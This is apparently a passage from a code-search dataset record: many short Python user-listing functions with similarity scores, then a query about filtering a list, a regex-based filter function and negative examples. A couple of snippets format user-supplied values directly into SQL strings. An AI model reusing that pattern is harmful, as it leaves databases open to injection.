str(get_data.get_user_post_count(username))\n print(descriptor.format(first, second))\n else:\n print('no users found in the database')", "def user_list(ctx):\n data = ctx.obj.get_all_users()\n output_json_data(data)", "def get_users(self):\n users = []\n page = 1\n while not len(users) % 100:\n users += self._get('/users?{0}'.format(urllib.urlencode({'per_page': 100, 'page': page})))\n if not users:\n break\n page += 1\n return users", "def list_users(self, user=None):\n from expfactory.database.models import Participant\n\n participants = Participant.query.all()\n users = []\n for user in participants:\n users.append(self.print_user(user))\n return users", "def get_users():\n return db.fetch_users()", "def keys(self):\n tuples = self._execute(\"SELECT name FROM users\")\n ret = [tup[0] for tup in tuples]\n return ret", "def view_list_users(self, user):\r\n return user.realm._users.keys()", "def _list_users(self):\n users = fileIO.load_json(\"users.json\")\n print(\"The list of users is as follows:\")\n for i in users:\n print(users[i][\"name\"])\n self._list_user_settings(users)", "def project_users(): \r\n project_school = api.projects.get_by_slug('ps') \r\n users_list = []\r\n for member in project_school.members:\r\n users_list.append(member.username + '@miem.hse.ru')\r\n \r\n #replaces some users usernames as they are different in taiga than in google groups \r\n for user in range(len(users_list)):\r\n if (users_list[user] == 'DenisPalukha@miem.hse.ru'):\r\n users_list[user] = 'dvpalukha@miem.hse.ru'\r\n if (users_list[user] == 'Affid@miem.hse.ru'):\r\n users_list[user] = 'aafyodorov@miem.hse.ru'\r\n \r\n return users_list", "def get_user_list():\n response = []\n for user in mongo.db.users.find():\n user[\"_id\"] = str(user[\"_id\"])\n response.append(user)\n return response", "def list_users(self):\n _url = \"http://\" + self.host_ip + \":35357/v2.0/users\"\n _body = None\n _headers = {'Content-type': 'application/json',\n 'x-auth-token': self.cloud_admin_info['token_project']}\n\n response = self.request(\"GET\", _url, _headers, _body)\n if response is None:\n LOG_OBJ.error(\" no response from Server\")\n return response\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\n \"get user list Failed with status %s \" %\n response.status)\n return response.status\n\n output = json.loads(response.data)\n LOG_OBJ.info(\"users List : %s\")\n return output[\"users\"]", "def get_users_by_name(query):\n\n user_list = None\n if query == None:\n user_list = User.objects.filter(Q(user_profile__isnull=False))\n else:\n user_list = User.objects.filter(Q(first_name__icontains=query) | Q(last_name__icontains=query)).distinct()\n return user_list", "def get_names(self):\r\n names = []\r\n for p in self.people:\r\n names.append(p.get_name())\r\n return names", "def list_users(self, stream_name:str, version:int=1)->List[str]:\n stream_path = self._get_storage_path(stream_name=stream_name, version=version)\n all_users = self._ls_dir(stream_name=stream_name, version=version)\n user_ids = []\n for usr in all_users:\n user_ids.append(usr.replace(stream_path,\"\").replace(\"user=\",\"\").replace(\"study=\"+self.study_name, \"\"))\n return user_ids", "def get_users(self):\n return self.execute(TABELLE['users']['select']['all'])", "def getAllUsers(self):\r\n return [(ind, user) for ind, user in enumerate(self.users)]", "def get_users(self):\n res = self.conn.cursor().execute('SELECT id,email,username FROM users')\n return res.fetchall()", "def getUsers(self) -> List[bbUser.bbUser]:\n 
return list(self.users.values())", "def list_user():\n\tbegin = 0\n\tlength = 25\n\ttry:\n\t\tif request.json != None:\n\t\t\tbegin = int(request.json.get('begin', 0))\n\t\t\tlength = int(request.json.get('length', 25))\n\texcept:\n\t\tabort(403)\n\tif length > 100 :\n\t\tlength = 100\n\tuserList = User.list(begin, length)\n\tif userList == None:\n\t\tabort(400)\n\treturn jsonify({'users': map(lambda(e): e.output(), userList), 'begin': begin, 'length': len(userList)})", "def _get_userlist_by_userright(self, userright):\n params = {\n \"action\": \"query\",\n \"list\": \"allusers\",\n \"format\": \"json\",\n \"augroup\": userright,\n \"aulimit\": \"500\",\n }\n r = self.session.get(ENWIKI_API, params=params)\n data = r.json()\n return [u[\"name\"] for u in data[\"query\"][\"allusers\"]]", "def get_user_list(self, connection):\n http = get_web_service(connection)\n try:\n req = http.request('GET', connection[\"url\"] + '/users/?_format=json')\n data = json.loads(req.data.decode('utf-8'))\n # print(json.dumps(data, indent=4, sort_keys=True))\n return data\n except urllib3.exceptions.HTTPError as e:\n print(\"Connection error\")\n print(e)", "def getUsers(self):\n logger.debug(\"Func: getUsers\")\n\n return sorted(self._usersDict.keys())", "def get_users_admins_name(self, session) -> Tuple[int, str, str]:\n users = (\n session.query(User.chat_id, User.first_name, User.last_name)\n .all()\n )\n return users", "def getMembersName(self):\n listMemberName = []\n for member in self.playersAndRoles:\n listMemberName.append(member.user.name)\n random.shuffle(listMemberName)\n return listMemberName", "def list_users():\n users = User.query.order_by(User.last_name, User.first_name).all()\n return render_template('index.html', users=users)", "def fetch_users(self, username_list=None):\n cursor = DB.instance.connection.cursor()\n # create string to fetch multiple usernames specified in username_list\n if len(username_list) is not None and isinstance(username_list, list):\n searches = \"','\".join(username_list)\n query = \" SELECT * FROM users WHERE Username in ('{}')\".format(searches)\n cursor.execute(query)\n else:\n cursor.execute(''' SELECT * FROM users ''')\n\n return cursor.fetchall()", "def user_list(self, mapp, url_of_liveserver):\n return mapp.getjson(url_of_liveserver)['result'].keys()", "def getResponsibleUsers():", "def getUsers(users_file):\n user_names = tuple(open(users_file, 'r'));\n for user_name in user_names:\n clean_user_name = user_name.rstrip(\"\\n\")\n listQuestions(clean_user_name)", "def do_user_list(cs, args):\n _, users = cs.users.list()\n fields = ['user_id', 'username', 'email', 'realname', 'comment']\n utils.print_list(users, fields, sortby=args.sortby)", "def get_users_for(self, server, channame):\n skey = server.lower()\n ckey = irc.strings.lower(channame)\n users = []\n if skey in self.serverchans and ckey in self.serverchans[skey]:\n users = self.serverchans[skey][ckey].users.keys()\n return users", "def get_users(self):\n return self.get_all_dbusers()", "def query(self, *args, **kwargs) -> List[str]:\r\n self.logger.info(\"Returning Manual Users\")\r\n\r\n return kwargs['users']", "def get_users(self) -> List[Dict[str, Any]]:\n users = self.user_manager.get_users()\n return [\n {\n 'user_id': user.user_id,\n 'username': user.username,\n 'created_at': user.created_at.isoformat(),\n }\n for user in users\n ]", "def users_get(): # noqa: E501\n base.check_session()\n ret = []\n for u in users.values():\n ret.append(_cleanuser(u))\n return ret", "def _load_users(self) -> 
List[Dict]:\n try:\n api_call = self.web_client.api_call('users.list')\n if api_call.get('ok'):\n return api_call.get('members')\n except Exception:\n LOGGER.exception('Cannot get users')\n raise", "def get_members(self):\r\n database = main.connect_to_cloudsql()\r\n cursor = database.cursor()\r\n query = (\"SELECT username from \" + ENV_DB + \".Groups WHERE gid='{}'\").format(self.g_id)\r\n cursor.execute(query)\r\n data = cursor.fetchall()\r\n database.close()\r\n return list(i[0] for i in data)", "def lookup_users(self):\n return self.slack_users", "def names(self) -> list[str]:", "def reponames(gh, user):\n return [u.split('/')[-1] for u in urls(gh, user)]", "async def list_users(self) -> List[int]:\n return [\n # row[0]\n # async for row in self.conn.execute(\n # \"select userid from tg_users\",\n # )\n ]", "def list( self, mess, args):\n user = self.get_sender_username(mess)\n args = args.replace(' ', '_')\n if user in self.users:\n user_list = 'All these users are subscribed - \\n'\n user_list += '\\n'.join(['%s :: %s' %(u, self.users[u]) for u in sorted(self.users)])\n if self.invited.keys():\n user_list += '\\n The following users are invited - \\n'\n user_list += '\\n'.join(self.invited.keys())\n self.log.info( '%s checks list of users.' % user)\n return user_list", "def users_view():\n users = get_users()\n data = get_data()\n result = [{'user_id': i, 'name': users[i]}\n for i in users.keys() if int(i) in data.keys()]\n #import pdb; pdb.set_trace()\n result.sort(key=lambda item: item['name'], cmp=locale.strcoll)\n return result", "def get_users():\n users = User.query.order_by(User.id).all()\n users = {user.id: user.username for user in users}\n\n response = jsonify({\"success\": True, \"users\": users})\n\n return response", "def get_list_of_names():\n conn = r.connect(host=HOST, port=PORT, db=DB)\n names = r.table(FINGERPRINT_TABLE)[\"name\"].run(conn)\n return list(names)", "def users(message):\n user_list = []\n for userid, user in iteritems(message._client.users):\n user_list.append(user[\"name\"])\n message.reply(Strings['USERS_FOUND'].format(len(user_list)))", "def list_users():\n check_admin()\n results = User.query.order_by(-User.id)\n return render_template('user_list.html', users=results)", "def get_users():\n\n return User.query.all() # [<User user_id=1 fname=Alice lname=Apple>]", "def getMyUsers(self):\n my_users = None\n if self.current_user.is_superuser or self.current_user.has_perm(\"manage_input_templates\"):\n my_users = UserCompany.objects.filter(\n company__pk=self.client_session.companyId).all()\n else:\n my_users = UserCompany.objects.filter(pk=self.client_session.userCompanyId).all()\n\n ids = []\n if my_users.count() > 0:\n ids = [str(d.id) for d in my_users]\n return \",\".join(ids)", "def users_get(self) -> Dict[str, list]:\n self.__logger.debug('Eva.users_get called')\n return self.__http_client.users_get()", "def get_users():\n return Response(f\"{User.get_all_users()}\", 200, mimetype='text/plain')", "def listUsers(self):\n return tuple(User.create({'name':name},self._modelDataManager) for name in self.pm_getUserManager().listUsers())", "def list_users_in_pool():\n files = []\n USERS_DIR = os.path.join(UPLOAD_DIRECTORY, \"users\")\n for filename in os.listdir(USERS_DIR):\n path = os.path.join(USERS_DIR, filename)\n if os.path.isdir(path):\n files.append(filename)\n return jsonify(files)", "def build_users_list():\n\n # Cannot query in cronjob (only use case for this func) without app running.\n # Must build separate connection to read file\n # con = 
sqlite3.connect(f\"{cur_wd}/bigbeta/site.db\")\n # cur = con.cursor()\n # users_list = [u for u in cur.execute(\"SELECT email FROM user;\")]\n\n # Get app context\n\n with bigbeta_app.app_context():\n users = User.query.all()\n user_emails = [user.email for user in users]\n\n return user_emails", "def users(self, site = None):\r\n uids = self.user_ids()\r\n if uids:\r\n users = Account._byID(uids, True, return_dict = False)\r\n return [self.ajax_user(u) for u in users]\r\n else:\r\n return ()", "def get_users_list_full(self, session):\n\n users = session.query(\n User.chat_id,\n User.is_banned,\n User.username,\n User.first_name,\n User.last_name,\n User.time_registered\n ).filter(User.is_admin==False).all()\n return users", "def get_all_names(self):\r\n return [person.name for person in self.__person_repository.elements]" ]
[ "0.8277952", "0.8237998", "0.821286", "0.8186258", "0.80364215", "0.79730445", "0.78307825", "0.7717235", "0.7714539", "0.7674189", "0.7632501", "0.7603505", "0.75877964", "0.75004154", "0.7474869", "0.74285185", "0.7409626", "0.7409626", "0.73354083", "0.7305028", "0.72556496", "0.71941495", "0.71814173", "0.7154391", "0.71430695", "0.71301305", "0.7106048", "0.71034783", "0.708575", "0.70633376", "0.7062982", "0.70109504", "0.69898564", "0.69842374", "0.698283", "0.6976332", "0.69733", "0.6971408", "0.6960198", "0.6913392", "0.69124246", "0.6910283", "0.69069743", "0.6904465", "0.6892961", "0.6890487", "0.68691504", "0.6867129", "0.68454385", "0.6838666", "0.6836775", "0.6834945", "0.68321633", "0.6828626", "0.6822775", "0.6809209", "0.678551", "0.6765991", "0.6755425", "0.6736579", "0.6732395", "0.6726917", "0.6721095", "0.6720483", "0.66916907", "0.6689817", "0.6680117", "0.66798544", "0.6675807", "0.66755784", "0.6667357", "0.66303897", "0.663017", "0.66281146", "0.66262573", "0.6608776", "0.6597781", "0.6591233", "0.6588271", "0.65765214", "0.65755635", "0.6572124", "0.6569173", "0.6563275", "0.6554915", "0.6537525", "0.6537197", "0.65119535", "0.6508451", "0.65079314", "0.65029764", "0.6499999", "0.64967215", "0.6489922", "0.6482652", "0.6474419", "0.64704734", "0.646518", "0.64639825", "0.64625454", "0.64530057" ]
0.0
-1
filters lst. returns sublist
def filt(seq, lst): regex = "(" + ")|(".join(seq) + ")" regex = re.compile(regex) slst = list(filter(regex.search, lst)) return slst # still need a checkUsername function
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _sublist(self, lst, exclude, length):\n for sublist in itertools.combinations([e for e in lst if e not in exclude], length):\n yield list(sublist)", "def my_filter(function,lst):\n return list(x for x in lst if function(x))", "def filter(lst):\n res = []\n for name in lst:\n if name[1] == 1:\n res.append(name[0])\n return res", "def _filter(self, lst):\n\n lst = list(set(lst)) # removes duplicate items\n if lst is None:\n return []\n arr = []\n for item in lst:\n for typ in [str(g) for g in self.__class__.OBJ_TYPES]:\n if cmds.objectType(item) == typ:\n arr.append(item)\n\n arr.sort(key=lambda x: x.count('|'))\n return arr[::-1] # reverse list", "def filter_list(self, node_list):\n filtered_list = []\n for node in node_list:\n if self.is_member(node):\n filtered_list.append(node)\n return filtered_list", "def filterPick(list, filter, classification):\n y = []\n for job in list:\n x = [(job, classification) for l in job for m in (filter(l),) if m]\n y.append(x)\n return y", "def split_list(items, pred):\n\n thisresult = []\n results = [thisresult]\n for i in items:\n thisresult.append(i)\n if pred(i):\n thisresult = []\n results.append(thisresult)\n return results", "def simple_filter(f, l):\n # a list comprehension with an 'if' clause goes the job nicely\n return [ item for item in l if f(item) ]", "def filter_list(prev_list, current_list, zeta):\n filtered_list = []\n for i, current_val in enumerate(current_list):\n prev_val = prev_list[i]\n filtered_list.append(\n moving_average_filter(current_val, prev_val, zeta))\n return filtered_list", "def subsets(lst):\n\tsubSet = [[]]\n\tfor element in lst:\n\t\tfor s in subSet[:]:\n\t\t\tsubSet.append(s.copy())\n\t\t\ts.append(element)\n\treturn subSet", "def simple_filter_2(f, l):\n # alternative implementation: the same as above, but without comprehension.\n filtered_l = []\n for item in l:\n if f(item):\n filtered_l.append(item)\n return filtered_l\n # I think the list comprehension is not only shorter, but also more\n # readable.", "def sub_list(l):\n r = []\n\n for i in l:\n if type(i) in prims:\n r.append(i)\n elif type(i) is list:\n r.append(sub_list(i))\n elif type(i) is dict:\n r.append(sub_dict(i))\n else:\n print \"Unknown Type: {}\".format(type(i))\n r = sorted(r)\n return r", "def extract_sub_list(mylist, indices):\n return [mylist[ii] for ii in indices]", "def split_list_by(lst, sepfunc, includesep):\n\tblocks = []\n\tblock = []\n\tfor elem in lst:\n\t\tif sepfunc(elem):\n\t\t\tif includesep:\n\t\t\t\tblock.append(elem)\n\t\t\tblocks.append(block)\n\t\t\tblock = []\n\t\telse:\n\t\t\tblock.append(elem)\n\tif len(block):\n\t\tblocks.append(block)\n\treturn blocks", "def partition(lst, pred):\n start = []\n append = start.append\n\n while lst:\n x, lst_ = lst.uncons\n if pred(x):\n break\n lst = lst_\n append(x)\n\n return List(start), lst", "def slice_by_index(lst, indexes):\r\n if not lst or not indexes:\r\n return []\r\n slice_ = itemgetter(*indexes)(lst)\r\n if len(indexes) == 1:\r\n return [slice_]\r\n return list(slice_)", "def sub_lists(my_list):\r\n subs = []\r\n for i in range(0, len(my_list)+1):\r\n temp = [list(x) for x in combinations(my_list, i)]\r\n if len(temp)>0:\r\n subs.extend(temp)\r\n return subs", "def lsThroughFilter(*args, item: Union[AnyStr, List[AnyStr]]=\"\", nodeArray: bool=True, reverse:\n bool=True, selection: bool=True, sort: AnyStr=\"\", **kwargs)->List[AnyStr]:\n pass", "def flat_list(list_: list) -> list:\n return [item for sublist in list_ for item in sublist]", "def split_lst(lst, delimiter, 
keep_delimiter=True):\n if keep_delimiter:\n append = [delimiter]\n else:\n append = []\n sublists = [list(y) + append\n for x, y \n in itertools.groupby(lst, lambda z: z == delimiter) \n if not x]\n return sublists", "def lst_and_pattern (filer_lst, pattern):\r\n new_filter_lst=[]\r\n for word in filer_lst:\r\n if word_and_pattern(word,pattern):\r\n new_filter_lst.append(word)\r\n return new_filter_lst", "def list_filter(x:int, xs:list) -> list:\n temp = []\n for i in xs:\n if i > x:\n temp.insert(i)\n return temp", "def flattenList(input_list):\r\n return [item for sublist in input_list for item in sublist]", "def filter_list_freq(lst, min_freq):\r\n arr = np.array(lst)\r\n items, count = np.unique(np.array(arr), return_counts=True)\r\n rem_items = items[count < min_freq]\r\n return [i for i in arr[~np.in1d(np.array(arr), rem_items)]]", "def compress_list(src_list):\n return [item for item in src_list if item]", "def filter_list(data: List[dict], field: str, selected: List[str]):\n if len(selected):\n return [x for x in data if x[field] in selected]\n else:\n return data", "def break_list_to_sub_list(self, full_list, chunk_size = 45):\n if chunk_size < 1:\n chunk_size = 1\n return [full_list[i:i + chunk_size] for i in range(0, len(full_list), chunk_size)]", "def flatten_list(l):\n return [item for sublist in l for item in sublist]", "def slice_by_index(lst, indices):\r\n slicer = itemgetter(*indices)(lst)\r\n if len(indices) == 1:\r\n return [slicer]\r\n return list(slicer)", "def nest_sublists(lst, length):\n return [\n [sublist for sublist in lst[index:index+length]]\n for index in range(0, len(lst), length)\n if index <= len(lst)\n ]", "def filtered(self, keys, lst=None, func=\"all\"):\n lst = self if lst is None else lst\n if len(lst) == 0:\n raise ValueError(\"No rows in list\")\n return [row for row in self.filter(keys, lst, func=func)]", "def flatten( liste ) :\n return list(set([ e for sublist in liste for e in sublist ]))\n # TODO :\n # more efficient to use\n # import itertools\n # list(itertools.chain(*list2d))", "def _select_sublist(lst, target):\n ln = len(lst)\n\n # Generate an array that indicates the decision bit for each element in the list.\n # If an element is deterministically true, then no decision bit is needed.\n choice_bits = [None] * ln\n x = 0\n for i in range(0, ln):\n if lst[i][1] not in (target.TRUE, target.FALSE):\n choice_bits[i] = x\n x += 1\n\n # We have 2^x distinct lists. 
Each can be represented as a number between 0 and 2^x-1=n.\n n = (1 << x) - 1\n\n while n >= 0:\n # Generate the list of positive values and node identifiers\n # noinspection PyTypeChecker\n sublist = [lst[i] for i in range(0, ln)\n if (choice_bits[i] is None and lst[i][1] == target.TRUE) or\n (choice_bits[i] is not None and n & 1 << choice_bits[i])]\n # Generate the list of negative node identifiers\n # noinspection PyTypeChecker\n sublist_no = tuple([target.negate(lst[i][1]) for i in range(0, ln)\n if (choice_bits[i] is None and lst[i][1] == target.FALSE) or (\n choice_bits[i] is not None and not n & 1 << choice_bits[i])])\n if sublist:\n terms, nodes = zip(*sublist)\n else:\n # Empty list.\n terms, nodes = (), ()\n yield terms, nodes + sublist_no + (0,)\n n -= 1", "def flatten_list(in_list):\n return [item for sublist in in_list for item in sublist]", "def genSubset(L):\n if len(L) == 0:\n return [[]] # list of empty list\n smaller = genSubset(L[:-1]) # the list without last element\n extra = L[-1:] # a list of just the last element\n new = []\n for small in smaller:\n new.append(small + extra)\n return smaller + new", "def _subset(lst: list, val_filter: str) -> int:\n \n for i, v in enumerate(lst):\n if v == val_filter:\n return i", "def filter_generic(mt_list, func):\r\n return [mt for mt in mt_list if func(mt)]", "def list_powerset(lst):\n result = [[]]\n for x in lst:\n result.extend([subset + [x] for subset in result])\n result.pop(0)\n return result", "def flatten(l):\n return [item for sublist in l for item in sublist]", "def flatten(l):\n return [item for sublist in l for item in sublist]", "def filtreDsup2(liste):\r\n l=[]\r\n for i in range(len(liste)):\r\n if liste[i][5]>=2: l.append(i)\r\n return l", "def filter(self, fn):\r\n\t\treturn FilterProjectedList(self, [fn])", "def FilterConfrontationList(C, match_list):\n if len(match_list) == 0:\n return C\n Cf = []\n for c in C:\n for match in match_list:\n if match in c.longname:\n Cf.append(c)\n return Cf", "def slice_list(list_to_slice, *upper_bounds):\n list_to_return=[]\n for upper_bound in upper_bounds:\n if (len(list_to_slice)>upper_bound):\n print('Slicing...')\n list_to_return.append(list_to_slice[:upper_bound])\n else:\n list_to_return.append(None)\n \n return list_to_return", "def dividelists(oldlst, tweet):\n for each in oldlst:\n if each == tweet:\n print('REMOVED', each[0], each[1], each[2], each[3])\n print('true:', each)\n oldlst.remove(each)\n print('each:', each)\n else:\n print('wut')\n pass\n return oldlst", "def get_subset(mlist,year):\n newlist = []\n for entry in mlist:\n if int(entry[0][:4]) > int(year):\n continue\n newvec = entry[:8]\n citations = entry[8]['citations']\n citations = filter(lambda a: int(a[:4]) <= int(year), citations)\n newvec[2] = len(citations)\n newlist.append(newvec)\n return newlist", "def subset_of_list(alist, n, t):\n if t < 1 or t > n:\n raise Exception(f't={t} is not accept, must be 1-N (include)')\n\n if n > len(alist): # if n is bigger than all list, return only 1 for t<=len\n if t <= len(alist):\n return [alist[t - 1]]\n else:\n return None\n\n m = int(len(alist) / n) # each task of a section of list\n\n start_index = int((t - 1) * m)\n if t == n:\n sublist = alist[start_index:]\n else:\n sublist = alist[start_index:start_index + m]\n # logger.debug(f'n={n}, t={t}, section={m}, index={start_index}:{start_index + m}')\n return sublist", "def flat_list_of_lists(l):\n return [item for sublist in l for item in sublist]", "def multiListSlice(lol, index):\n divisor = 1\n values = 
[]\n for i in range(0, len(lol)):\n index = (index / divisor) % len(lol[i])\n values[i] = lol[i][index]\n divisor *= len(lol[i])\n return values", "def filtreSpeciales(liste):\r\n l=[]\r\n for i in range(len(liste)):\r\n if liste[i][0]==0: l.append(i)\r\n return l", "def slice_list(in_list, lens):\n if isinstance(lens, int):\n assert len(in_list) % lens == 0\n lens = [lens] * int(len(in_list) / lens)\n if not isinstance(lens, list):\n raise TypeError('\"indices\" must be an integer or a list of integers')\n elif sum(lens) != len(in_list):\n raise ValueError(\n \"sum of lens and list length does not \"\n f\"match: {sum(lens)} != {len(in_list)}\"\n )\n out_list = []\n idx = 0\n for i in range(len(lens)):\n out_list.append(in_list[idx : idx + lens[i]])\n idx += lens[i]\n return out_list", "def split_registrations(list_of_registrations):\n list_of_registrations.sort(key=lambda registration: registration.service)\n\n sub_list = []\n main_list = []\n previous = list_of_registrations[0]\n\n for registration in list_of_registrations:\n if previous.service == registration.service:\n sub_list.append(registration)\n else:\n main_list.append(sub_list)\n sub_list = [registration]\n previous = registration\n\n main_list.append(sub_list)\n return main_list", "def remove_every_other(lst):\n return [ea for ea in lst if lst.index(ea) % 2 == 0 ]", "def filter(self, callback: Callable) -> 'List':\n if not callable(callback):\n raise ValueError('The callback should be callable')\n\n return List(item for item in self if callback(item))", "def slice(list, point):\n index = list.index(point)\n slices = []\n \n slices.append(list[:index])\n slices.append(list[index + 1:])\n \n return slices", "def filtered(self, func):\n return PSetList(list(filter(func, self.sets)))", "def flatten(ls):\r\n return [item for sublist in ls for item in sublist]", "def filter(list_tweets):\n for index, item in enumerate(list_tweets):\n if isinstance(item, list):\n print(item)\n list_tweets[index] = item[0]\n return list_tweets", "def filter_fn(arr):\n return lambda l: ([n for n in arr if n == l])", "def big_selections(lst: List[int], n: int) -> List[List[int]]:\n if not lst:\n return [[]]\n else:\n holder = [lst.copy()]\n for i in range(len(lst)):\n l2 = lst.copy()\n l2.pop(i)\n for item in selections(l2):\n if item not in holder and sum(item) >= n:\n holder.append(item)\n return holder", "def prune_empty(lst: List[T]) -> List[T]:\n return [elem for elem in lst if elem]", "def filter_list(l):\n return list(filter(lambda x: type(x) == int, l))", "def filter(self, filters:list)->list:\n for item in self.list:\n use_item = True\n for filter in filters:\n filter_key, filter_value, filter_type = filter\n if filter_type == \"<\" and item[filter_key] >= filter_value:\n use_item = False\n break\n elif filter_type == \">\" and item[filter_key] <= filter_value:\n use_item = False\n break\n elif filter_type == \"<=\" and item[filter_key] > filter_value:\n use_item = False\n break\n elif filter_type == \">=\" and item[filter_key] < filter_value:\n use_item = False\n break\n elif filter_type == \"=\" and not item[filter_key] == filter_value:\n use_item = False\n break\n if use_item:\n yield item", "def cfilter(func,iterable):\n result = []\n\n for i in iterable:\n\n if func(i) == True:\n result.append(i)\n\n return result", "def Filter(self,val):\n \n #set th elength of the lis to 0\n List = [self.InitialList[i] for i in range(0,len(self.InitialList))]\n FilterValues = [None]\n Grab = [None]\n Headers = []\n \n #create the quick index\n for i in 
range(len(self.Condensensed)):\n \n Headers.append([self.Condensensed[i][l][0] for l in range(len(self.Condensensed[i]))])\n \n #grab the values...\n for j in range(len(self.Variables)):\n \n FilterValues.append(self.Variables[j].get())\n\n if self.Variables[j].get().split(' ')[0] == 'All':\n \n Grab.append(False)\n \n else:\n \n Grab.append(True)\n \n #intermediate list to compare\n ToCompare = []\n \n for i in range(1,len(Grab)):\n \n if Grab[i]:\n \n #find the index\n l = Headers[i].index(FilterValues[i])\n \n #grab it\n ToCompare.append([self.Condensensed[i][l][m] for m in range(len(self.Condensensed[i][l]))])\n\n\n for i in range(0, len(ToCompare)):\n \n List = list(set(List).intersection(ToCompare[i]))\n\n #update the interface\n self.Gatherer(List,list(self.Input))\n self.BuildTree()", "def flatten_list(lst):\n assert isinstance(lst, list), \"you didn't pass a list!\"\n\n if isinstance(lst[0], list):\n if len(lst[0])>1:\n return ['-'.join(i) for i in lst] # then its a kpoints list\n return flatten_list([i[0] for i in lst])\n else:\n return [i for i in lst]", "def flatten(src):\n return [item for sublist in src for item in sublist]", "def partition_list(lis, threshold):\n chunk, partial = [], 0\n idx = 0\n while idx < len(lis):\n if lis[idx].size < threshold:\n while partial < threshold and idx < len(lis):\n chunk.append(lis[idx])\n partial += lis[idx].size\n idx += 1\n\n yield chunk\n chunk, partial = [], 0\n else:\n yield lis[idx]\n idx += 1", "def sub(a_list: list[int], b: int, c: int) -> list[int]:\n list_returned: list[int] = []\n while len(a_list) == 0:\n if b > len(a_list) or c <= 0:\n return []\n if b < 0:\n list_returned.append(a_list[0])\n else:\n list_returned.append(a_list[b])\n if c > len(a_list):\n list_returned.append(a_list[len(a_list) - 1])\n else:\n list_returned.append(a_list[c - 1])\n return list_returned", "def concat_list(lst, batch_flags=None):\n slices = [slice(0)] * len(lst)\n datas = []\n row_flag = 0\n for i, r in enumerate(lst):\n if r is None:\n slices[i] = None\n continue\n j = -1\n if batch_flags is None or batch_flags[i]:\n for j, d in enumerate(r):\n datas.append(d)\n slices[i] = slice(row_flag, row_flag + j + 1)\n else:\n datas.append(r)\n slices[i] = row_flag\n row_flag += j + 1\n return datas, slices", "def mutate_list_2(lst):\r\n elem = lst[0]\r\n lst.remove(elem)\r\n lst.append(elem)\r\n return lst", "def get_slice_from_list(self,list_,start=0,end=None):\r\n start = self._index_to_int(start,True)\r\n if end is not None:\r\n end= self._index_to_int(end)\r\n\r\n return list_[start:end]", "def split_list(l, k):\n\n\tn = len(l)\n\tsublists = []\n\tnsubs = n / k\n\tnrems = n % k\n\n\t# little algo to split lists.\n\n\ti = int(0)\n\twhile i < n:\n\t\tsublists.append(l[i:i+k])\n\t\ti += k\n\n\treturn sublists", "def check_list(list_obj, limit):\r\n if len(list_obj) > limit:\r\n num_of_lists = int(len(list_obj) / limit) + 1\r\n sublist = []\r\n k = 0\r\n while k < num_of_lists:\r\n x = list_obj[limit*k:limit*(k+1)]\r\n sublist.append(x)\r\n k += 1\r\n\r\n return sublist\r\n\r\n return list_obj", "def filter(self, fn: Callable[[Tuple[K, List[V]]], bool]) -> Iterator[Tuple[K, List[V]]]:\n return (entry for entry in iter(self) if fn(entry))", "def filter_subspans(spans: List[Tuple[int, int]]) -> List[Tuple[int, int]]:\n filtered = []\n\n for span in spans:\n accept = True\n for compared in spans:\n if span[0] >= compared[0] and span[1] <= compared[1]:\n if span[0] != compared[0] or span[1] != compared[1]:\n accept = False\n if accept:\n 
filtered.append(span)\n\n filtered = list(dict.fromkeys(filtered)) # remove duplicates if present\n\n return filtered", "def powerset(lst):\n return reduce(lambda rslt, x: rslt + [subset + [x] for subset in rslt],\n lst, [[]])", "def build_extracted_list(input_list, subinterval):\n out = []\n wait = subinterval\n for i in input_list:\n if wait == subinterval:\n out.append(i)\n wait = 0\n else:\n wait += 1\n return out", "def flatten(lol ):\n return [item for sublist in lol for item in sublist]", "def _get_subgroups(self):\n groups = [] # array of arrays\n for i in range(self.filter.shape[0]):\n for j in range(i):\n if self.filter[i][j]:\n if len(groups) < 1:\n groups.append([j, i])\n continue\n found = False\n for group_i, _ in enumerate(groups):\n if i in groups[group_i]:\n if j not in groups[group_i]:\n groups[group_i].append(j)\n found = True\n elif j in groups[group_i]:\n if i not in groups[group_i]:\n groups[group_i].append(i)\n found = True\n if not found:\n groups.append([i, j])\n return groups", "def apply_function_to_nested_list(func, l):\n from itertools import chain\n result = func(list(chain(*l)))\n csum = np.cumsum(map(len, l))\n new_l = [result[(0 if i == 0 else csum[i-1]):csum[i]] for i in range(len(l))]\n return new_l", "def getall(l, idx):\n return [l[i] for i in idx]", "def subset(arr, start, end):\n return [[row_data for row_data in row[start[1]:end[1]]] for row in arr[start[0]:end[0]]]", "def _strip_list(list):\n return [x for x in list if x]", "def flatten_lists(lst):\n return list(chain(*lst))", "def slice_list(input, size):\n input_size = len(input)\n slice_size = input_size // size\n remain = input_size % size\n result = []\n iterator = iter(input)\n for i in range(size):\n result.append([])\n for j in range(slice_size):\n result[i].append(next(iterator))\n if remain:\n result[i].append(next(iterator))\n remain -= 1\n return result", "def flattenList(l=None):\r\n flat_list = [item for sublist in l for item in sublist]\r\n return flat_list", "def Students_at_level(l:list,c:str)->list:\n result=[]\n for s in l:\n if s.level==c:\n result.append(s)\n return result", "def ft_filter(function_to_apply, list_of_inputs):\n if not callable(function_to_apply):\n exit(\"First param should be a Function\")\n try:\n object_iter = iter(list_of_inputs)\n except TypeError:\n exit(\"Second Argument must be iterable\")\n lst = []\n for item in list_of_inputs:\n if function_to_apply(item) == True: \n lst.append(item)\n return lst", "def custom_filter(some_func, iterator_list):\n\n local_iterator = from_input_to_list(iterator_list)\n func_map = [some_func(i) for i in local_iterator]\n true_list = [j for j in func_map if j > 100] # here we can hardcode any condition\n\n return true_list", "def _filter(self, filter_condition):\n def _inner_filter(item: list):\n return self._default_filter(item, filter_condition)\n\n self._result = list(filter(_inner_filter, self._data))", "def sublist(a, b):\n r = a[:]\n for i in b:\n r.remove(i)\n return r", "def filter_marks(lst):\n integers = []\n rest = []\n\n for ele in lst: # interate over list\n\n # 'type' will returns type of element\n # if type of element is integer append\n # element to integers list\n if type(ele) is int:\n integers.append(ele)\n else:\n # otherwise append in rest list\n rest.append(ele)\n\n # multiple comma seprated values are returned\n # as tuple in python\n return integers, rest", "def clean_list(lst, element_type='way'):\n return [clean_element(e, element_type=element_type) for e in lst]", "def __partition(self, lst, n):\n 
